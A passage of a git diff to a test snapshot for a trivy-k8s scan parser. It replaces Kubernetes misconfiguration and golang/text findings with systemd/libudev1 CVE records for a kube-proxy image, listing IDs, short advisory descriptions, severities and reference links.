10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-3821", + "installedVersion": "241-7~deb10u7", + "packageName": "libudev1", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-32149", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", - "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", - "https://github.com/golang/go/issues/56152", - "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", - "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", - "https://go.dev/cl/442235", - "https://go.dev/issue/56152", - "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", - "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", - "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", - "https://pkg.go.dev/vuln/GO-2022-1059", - "https://ubuntu.com/security/notices/USN-5873-1", - "https://www.cve.org/CVERecord?id=CVE-2022-32149", + "https://access.redhat.com/errata/RHSA-2023:0336", + "https://access.redhat.com/security/cve/CVE-2022-3821", + "https://bugzilla.redhat.com/2139327", + "https://bugzilla.redhat.com/show_bug.cgi?id=2139327", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3821", + "https://errata.almalinux.org/9/ALSA-2023-0336.html", + "https://errata.rockylinux.org/RLSA-2023:0336", + "https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e", + "https://github.com/systemd/systemd/issues/23928", + "https://github.com/systemd/systemd/pull/23933", + "https://linux.oracle.com/cve/CVE-2022-3821.html", + "https://linux.oracle.com/errata/ELSA-2023-0336.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RVBQC2VLSDVQAPJTEMTREXDL4HYLXG2P/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-3821", + "https://security.gentoo.org/glsa/202305-15", + "https://ubuntu.com/security/notices/USN-5928-1", + "https://www.cve.org/CVERecord?id=CVE-2022-3821", ], }, "category": "Vulnerability", - "description": "An attacker may cause a denial of service by crafting an Accept-Language header which ParseAcceptLanguage will take significant time to parse.", - "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=kubernetes-dashboard", + "description": "An off-by-one Error issue was discovered in Systemd in format_timespan() function of time-util.c. An attacker could supply specific values for time and accuracy that leads to buffer overrun in format_timespan(), leading to a Denial of Service.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "ParseAcceptLanguage takes a long time to parse complex tags", + "name": "buffer overrun in format_timespan() function", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-32149", + "value": "https://avd.aquasec.com/nvd/cve-2022-3821", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-32149", + "value": "https://access.redhat.com/errata/RHSA-2023:0336", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", + "value": "https://access.redhat.com/security/cve/CVE-2022-3821", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", + "value": "https://bugzilla.redhat.com/2139327", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/56152", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2139327", }, { "type": "URL", - "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3821", }, { "type": "URL", - "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", + "value": "https://errata.almalinux.org/9/ALSA-2023-0336.html", }, { "type": "URL", - "value": "https://go.dev/cl/442235", + "value": "https://errata.rockylinux.org/RLSA-2023:0336", }, { "type": "URL", - "value": "https://go.dev/issue/56152", + "value": "https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", + "value": "https://github.com/systemd/systemd/issues/23928", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", + "value": "https://github.com/systemd/systemd/pull/23933", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", + "value": "https://linux.oracle.com/cve/CVE-2022-3821.html", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-1059", + "value": "https://linux.oracle.com/errata/ELSA-2023-0336.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5873-1", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RVBQC2VLSDVQAPJTEMTREXDL4HYLXG2P/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-32149", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-3821", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Dockerfile' / Class: 'config' / Type: 'dockerfile'", - "id": "DS005", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://docs.docker.com/engine/reference/builder/#add", - "https://avd.aquasec.com/misconfig/ds005", - ], - }, - "category": "Misconfiguration", - "description": "You should use COPY instead of ADD unless you want to extract a tar file. Note that an ADD command will extract a tar file, which adds the risk of Zip-based vulnerabilities. Accordingly, it is advised to use a COPY command, which does not extract tar files.", - "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=kubernetes-dashboard", - "mitigation": "Use COPY instead of ADD", - "name": "ADD instead of COPY(Consider using 'COPY . /' command instead of 'ADD . /')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ds005", + "value": "https://security.gentoo.org/glsa/202305-15", }, { "type": "URL", - "value": "https://docs.docker.com/engine/reference/builder/#add", + "value": "https://ubuntu.com/security/notices/USN-5928-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-3821", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'Dockerfile' / Class: 'config' / Type: 'dockerfile'", - "id": "DS026", - "installedVersion": undefined, - "packageName": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-4415", + "installedVersion": "241-7~deb10u7", + "packageName": "libudev1", "references": [ - "https://blog.aquasec.com/docker-security-best-practices", - "https://avd.aquasec.com/misconfig/ds026", + "https://access.redhat.com/errata/RHSA-2023:0954", + "https://access.redhat.com/security/cve/CVE-2022-4415", + "https://bugzilla.redhat.com/2149063", + "https://bugzilla.redhat.com/2155515", + "https://bugzilla.redhat.com/show_bug.cgi?id=2149063", + "https://bugzilla.redhat.com/show_bug.cgi?id=2155515", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4415", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45873", + "https://errata.almalinux.org/9/ALSA-2023-0954.html", + "https://errata.rockylinux.org/RLSA-2023:0954", + "https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c", + "https://linux.oracle.com/cve/CVE-2022-4415.html", + "https://linux.oracle.com/errata/ELSA-2023-0954.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-4415", + "https://ubuntu.com/security/notices/USN-5928-1", + "https://www.cve.org/CVERecord?id=CVE-2022-4415", + "https://www.openwall.com/lists/oss-security/2022/12/21/3", ], }, - "category": "Misconfiguration", - "description": "You should add HEALTHCHECK instruction in your docker container images to perform the health check on running containers.", - "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=kubernetes-dashboard", - "mitigation": "Add HEALTHCHECK instruction in Dockerfile", - "name": "No HEALTHCHECK defined(Add HEALTHCHECK instruction in your Dockerfile)", + "category": "Vulnerability", + "description": "A vulnerability was found in systemd. This security flaw can cause a local information leak due to systemd-coredump not respecting the fs.suid_dumpable kernel setting.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "systemd: local information leak due to systemd-coredump not respecting fs.suid_dumpable kernel setting", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ds026", + "value": "https://avd.aquasec.com/nvd/cve-2022-4415", + }, + { + "type": "URL", + "value": "https://access.redhat.com/errata/RHSA-2023:0954", + }, + { + "type": "URL", + "value": "https://access.redhat.com/security/cve/CVE-2022-4415", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/2149063", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/2155515", }, { "type": "URL", - "value": "https://blog.aquasec.com/docker-security-best-practices", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2149063", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/kubernetes-dashboard' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV003", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", - "https://avd.aquasec.com/misconfig/ksv003", - ], - }, - "category": "Misconfiguration", - "description": "The container should drop all default capabilities and add only those that are needed for its execution.", - "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=kubernetes-dashboard", - "mitigation": "Add 'ALL' to containers[].securityContext.capabilities.drop.", - "name": "Default capabilities not dropped(Container 'kubernetes-dashboard' of Deployment 'kubernetes-dashboard' should add 'ALL' to 'securityContext.capabilities.drop')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv003", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2155515", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4415", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/kubernetes-dashboard' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV011", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", - "https://avd.aquasec.com/misconfig/ksv011", - ], - }, - "category": "Misconfiguration", - "description": "Enforcing CPU limits prevents DoS via resource exhaustion.", - "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=kubernetes-dashboard", - "mitigation": "Set a limit value under 'containers[].resources.limits.cpu'.", - "name": "CPU not limited(Container 'kubernetes-dashboard' of Deployment 'kubernetes-dashboard' should set 'resources.limits.cpu')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv011", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45873", }, { "type": "URL", - "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "value": "https://errata.almalinux.org/9/ALSA-2023-0954.html", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/kubernetes-dashboard' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV012", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv012", - ], - }, - "category": "Misconfiguration", - "description": "'runAsNonRoot' forces the running image to run as a non-root user to ensure least privileges.", - "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=kubernetes-dashboard", - "mitigation": "Set 'containers[].securityContext.runAsNonRoot' to true.", - "name": "Runs as root user(Container 'kubernetes-dashboard' of Deployment 'kubernetes-dashboard' should set 'securityContext.runAsNonRoot' to true)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv012", + "value": "https://errata.rockylinux.org/RLSA-2023:0954", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/kubernetes-dashboard' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV015", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", - "https://avd.aquasec.com/misconfig/ksv015", - ], - }, - "category": "Misconfiguration", - "description": "When containers have resource requests specified, the scheduler can make better decisions about which nodes to place pods on, and how to deal with resource contention.", - "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=kubernetes-dashboard", - "mitigation": "Set 'containers[].resources.requests.cpu'.", - "name": "CPU requests not specified(Container 'kubernetes-dashboard' of Deployment 'kubernetes-dashboard' should set 'resources.requests.cpu')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv015", + "value": "https://linux.oracle.com/cve/CVE-2022-4415.html", }, { "type": "URL", - "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "value": "https://linux.oracle.com/errata/ELSA-2023-0954.html", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/kubernetes-dashboard' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV016", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-resources-limits-memory/", - "https://avd.aquasec.com/misconfig/ksv016", - ], - }, - "category": "Misconfiguration", - "description": "When containers have memory requests specified, the scheduler can make better decisions about which nodes to place pods on, and how to deal with resource contention.", - "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=kubernetes-dashboard", - "mitigation": "Set 'containers[].resources.requests.memory'.", - "name": "Memory requests not specified(Container 'kubernetes-dashboard' of Deployment 'kubernetes-dashboard' should set 'resources.requests.memory')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv016", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4415", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-resources-limits-memory/", + "value": "https://ubuntu.com/security/notices/USN-5928-1", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/kubernetes-dashboard' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV018", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-resources-limits-memory/", - "https://avd.aquasec.com/misconfig/ksv018", - ], - }, - "category": "Misconfiguration", - "description": "Enforcing memory limits prevents DoS via resource exhaustion.", - "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=kubernetes-dashboard", - "mitigation": "Set a limit value under 'containers[].resources.limits.memory'.", - "name": "Memory not limited(Container 'kubernetes-dashboard' of Deployment 'kubernetes-dashboard' should set 'resources.limits.memory')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv018", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-4415", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-resources-limits-memory/", + "value": "https://www.openwall.com/lists/oss-security/2022/12/21/3", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/kubernetes-dashboard' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV020", - "installedVersion": undefined, - "packageName": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2013-4392", + "installedVersion": "241-7~deb10u7", + "packageName": "libudev1", "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv020", + "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", + "http://www.openwall.com/lists/oss-security/2013/10/01/9", + "https://access.redhat.com/security/cve/CVE-2013-4392", + "https://bugzilla.redhat.com/show_bug.cgi?id=859060", + "https://nvd.nist.gov/vuln/detail/CVE-2013-4392", + "https://www.cve.org/CVERecord?id=CVE-2013-4392", ], }, - "category": "Misconfiguration", - "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=kubernetes-dashboard", - "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", - "name": "Runs with low user ID(Container 'kubernetes-dashboard' of Deployment 'kubernetes-dashboard' should set 'securityContext.runAsUser' > 10000)", + "category": "Vulnerability", + "description": "systemd, when updating file permissions, allows local users to change the permissions and SELinux security contexts for arbitrary files via a symlink attack on unspecified files.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "TOCTOU race condition when updating file permissions and SELinux security contexts", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv020", + "value": "https://avd.aquasec.com/nvd/cve-2013-4392", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/kubernetes-dashboard' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV021", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv021", - ], - }, - "category": "Misconfiguration", - "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=kubernetes-dashboard", - "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", - "name": "Runs with low group ID(Container 'kubernetes-dashboard' of Deployment 'kubernetes-dashboard' should set 'securityContext.runAsGroup' > 10000)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv021", + "value": "http://www.openwall.com/lists/oss-security/2013/10/01/9", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://access.redhat.com/security/cve/CVE-2013-4392", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/kubernetes-dashboard' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV106", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv106", - ], - }, - "category": "Misconfiguration", - "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", - "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=kubernetes-dashboard", - "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", - "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv106", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=859060", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4392", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2013-4392", }, ], "severity": "LOW", @@ -113256,57 +112748,82 @@ exports[`should parse a trivy-k8s scan result of a cluster running secureCodeBox { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2011-3374", - "installedVersion": "2.2.4", - "packageName": "apt", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-20386", + "installedVersion": "241-7~deb10u7", + "packageName": "libudev1", "references": [ - "https://access.redhat.com/security/cve/cve-2011-3374", - "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=642480", - "https://people.canonical.com/~ubuntu-security/cve/2011/CVE-2011-3374.html", - "https://seclists.org/fulldisclosure/2011/Sep/221", - "https://security-tracker.debian.org/tracker/CVE-2011-3374", - "https://snyk.io/vuln/SNYK-LINUX-APT-116518", - "https://ubuntu.com/security/CVE-2011-3374", + "http://lists.opensuse.org/opensuse-security-announce/2020-02/msg00014.html", + "https://access.redhat.com/security/cve/CVE-2019-20386", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20386", + "https://github.com/systemd/systemd/commit/b2774a3ae692113e1f47a336a6c09bac9cfb49ad", + "https://linux.oracle.com/cve/CVE-2019-20386.html", + "https://linux.oracle.com/errata/ELSA-2020-4553.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HZPCOMW5X6IZZXASCDD2CNW2DLF3YADC/", + "https://nvd.nist.gov/vuln/detail/CVE-2019-20386", + "https://security.netapp.com/advisory/ntap-20200210-0002/", + "https://ubuntu.com/security/notices/USN-4269-1", + "https://usn.ubuntu.com/4269-1/", + "https://www.cve.org/CVERecord?id=CVE-2019-20386", ], }, "category": "Vulnerability", - "description": "It was found that apt-key in apt, all versions, do not correctly validate gpg keys with the master keyring, leading to a potential man-in-the-middle attack.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "description": "An issue was discovered in button_open in login/logind-button.c in systemd before 243. When executing the udevadm trigger command, a memory leak may occur.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "It was found that apt-key in apt, all versions, do not correctly valid ...", + "name": "systemd: memory leak in button_open() in login/logind-button.c when udev events are received", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2011-3374", + "value": "https://avd.aquasec.com/nvd/cve-2019-20386", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/cve-2011-3374", + "value": "http://lists.opensuse.org/opensuse-security-announce/2020-02/msg00014.html", }, { "type": "URL", - "value": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=642480", + "value": "https://access.redhat.com/security/cve/CVE-2019-20386", }, { "type": "URL", - "value": "https://people.canonical.com/~ubuntu-security/cve/2011/CVE-2011-3374.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20386", }, { "type": "URL", - "value": "https://seclists.org/fulldisclosure/2011/Sep/221", + "value": "https://github.com/systemd/systemd/commit/b2774a3ae692113e1f47a336a6c09bac9cfb49ad", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2011-3374", + "value": "https://linux.oracle.com/cve/CVE-2019-20386.html", }, { "type": "URL", - "value": "https://snyk.io/vuln/SNYK-LINUX-APT-116518", + "value": "https://linux.oracle.com/errata/ELSA-2020-4553.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2011-3374", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HZPCOMW5X6IZZXASCDD2CNW2DLF3YADC/", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-20386", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20200210-0002/", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-4269-1", + }, + { + "type": "URL", + "value": "https://usn.ubuntu.com/4269-1/", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-20386", }, ], "severity": "LOW", @@ -113314,135 +112831,173 @@ exports[`should parse a trivy-k8s scan result of a cluster running secureCodeBox { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-3715", - "installedVersion": "5.1-2+deb11u1", - "packageName": "bash", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2020-13529", + "installedVersion": "241-7~deb10u7", + "packageName": "libudev1", "references": [ - "https://access.redhat.com/errata/RHSA-2023:0340", - "https://access.redhat.com/security/cve/CVE-2022-3715", - "https://bugzilla.redhat.com/2126720", - "https://bugzilla.redhat.com/show_bug.cgi?id=2126720", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3715", - "https://errata.almalinux.org/9/ALSA-2023-0340.html", - "https://errata.rockylinux.org/RLSA-2023:0340", - "https://linux.oracle.com/cve/CVE-2022-3715.html", - "https://linux.oracle.com/errata/ELSA-2023-0340.html", - "https://lists.gnu.org/archive/html/bug-bash/2022-08/msg00147.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-3715", - "https://www.cve.org/CVERecord?id=CVE-2022-3715", + "http://www.openwall.com/lists/oss-security/2021/08/04/2", + "http://www.openwall.com/lists/oss-security/2021/08/17/3", + "http://www.openwall.com/lists/oss-security/2021/09/07/3", + "https://access.redhat.com/security/cve/CVE-2020-13529", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13529", + "https://linux.oracle.com/cve/CVE-2020-13529.html", + "https://linux.oracle.com/errata/ELSA-2021-4361.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", + "https://nvd.nist.gov/vuln/detail/CVE-2020-13529", + "https://security.gentoo.org/glsa/202107-48", + "https://security.netapp.com/advisory/ntap-20210625-0005/", + "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1142", + "https://ubuntu.com/security/notices/USN-5013-1", + "https://ubuntu.com/security/notices/USN-5013-2", + "https://www.cve.org/CVERecord?id=CVE-2020-13529", ], }, "category": "Vulnerability", - "description": "A flaw was found in the bash package, where a heap-buffer overflow can occur in valid parameter_transform. This issue may lead to memory problems.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "description": "An exploitable denial-of-service vulnerability exists in Systemd 245. A specially crafted DHCP FORCERENEW packet can cause a server running the DHCP client to be vulnerable to a DHCP ACK spoofing attack. An attacker can forge a pair of FORCERENEW and DCHP ACK packets to reconfigure the server.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "a heap-buffer-overflow in valid_parameter_transform", + "name": "systemd: DHCP FORCERENEW authentication not implemented can cause a system running the DHCP client to have its network reconfigured", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-3715", + "value": "https://avd.aquasec.com/nvd/cve-2020-13529", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:0340", + "value": "http://www.openwall.com/lists/oss-security/2021/08/04/2", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-3715", + "value": "http://www.openwall.com/lists/oss-security/2021/08/17/3", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2126720", + "value": "http://www.openwall.com/lists/oss-security/2021/09/07/3", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2126720", + "value": "https://access.redhat.com/security/cve/CVE-2020-13529", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3715", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13529", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-0340.html", + "value": "https://linux.oracle.com/cve/CVE-2020-13529.html", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0340", + "value": "https://linux.oracle.com/errata/ELSA-2021-4361.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-3715.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-0340.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-13529", }, { "type": "URL", - "value": "https://lists.gnu.org/archive/html/bug-bash/2022-08/msg00147.html", + "value": "https://security.gentoo.org/glsa/202107-48", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-3715", + "value": "https://security.netapp.com/advisory/ntap-20210625-0005/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-3715", + "value": "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1142", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5013-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5013-2", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-13529", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-0563", - "installedVersion": "1:2.36.1-8+deb11u1", - "packageName": "bsdutils", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 